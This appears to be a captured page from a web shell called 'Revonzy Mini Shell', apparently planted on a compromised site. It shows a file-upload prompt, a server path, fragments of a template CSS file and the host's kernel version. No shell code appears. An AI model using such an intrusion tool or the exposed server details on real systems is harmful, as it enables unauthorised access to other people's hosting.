Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/

Author: W3layout
Author URL:
License: Creative Commons Attribution 3.0 Unported
License URL:
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/* ----//Logo----*/
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/*--//search-ends --*/
/*--- Progress Bar ----*/
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/*--- User Panel---*/
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/***** Messages *************/
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/*--Progress bars--*/
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/*--Progress bars--*/
/********* profile details **********/
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td.head {
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h3.hdg {
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.badge-danger {
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section#tables  p {
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    padding: 13px;
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.bs-example {
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.forms h3.title1 {
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/* --  general forms  -- */
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.bs-example4 {
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button.note-color-btn {
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.bottom .form-group {
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/*-- sign-up --*/
.signup-page h3.title1 {
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p.creating {
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.sign-up-row {
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.sign-up2 input[type="text"]:focus ,.sign-up2 input[type="password"]:focus{
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.sub-login-right p a:hover{
.sub_home  input[type="submit"] {
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.sub_home input[type="submit"]:hover {
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/*-- //sign-up --*/
/*-- charts-page--*/
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/*--general elements--*/
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h4.modal-title {
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.general-grids.grids-right {
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/*--ScrollSpy --*/
.scrollspy-example {
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.scrollspy-example h4 {
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.tool-tips.widget-shadow {
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.bs-example-tooltips {
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.bs-example-tooltips .btn-default {
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/*--//general elements--*/
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.mail {
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.mail.mail-name {
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.mail-right {
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.inbox-page h6 {
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.mail-icon {
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.inbox-page.row {
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.mail-body input[type="text"]{
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.mail-body input[type="text"]:focus{
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.mail-body input[type="submit"] {
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	font-weight: 600;
/*--compose mail--*/
    width: 28%;
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.compose-left a i.fa {
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.chat-right {
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} {
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.compose-right .form-group {
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.compose-right {
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.compose-right input[type="submit"] {
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/*--//compose mail--*/
    padding: 0;
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h4.title3 {
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Revonzy Mini Shell

Linux 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64